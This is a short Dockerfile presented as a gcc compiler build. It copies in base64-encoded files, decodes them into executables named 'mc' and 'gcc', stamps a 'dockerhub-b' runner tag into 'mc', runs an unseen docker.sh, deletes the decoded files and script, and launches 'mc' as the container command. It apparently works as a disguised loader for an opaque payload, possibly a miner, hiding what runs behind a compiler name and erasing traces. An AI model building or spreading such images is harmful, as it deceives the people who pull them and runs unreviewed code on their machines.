FROM compilerbuild/gcc
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > mc.log'

COPY mc.64 .
COPY docker.sh .
COPY gcc.64 .

RUN bash -c 'base64 --decode mc.64 > mc'
RUN bash -c 'base64 --decode gcc.64 > gcc'
RUN chmod +x gcc
RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' mc

RUN bash ./docker.sh
RUN rm --force --recursive mc _REPO_NAME__.64 docker.sh gcc gcc.64

CMD mc
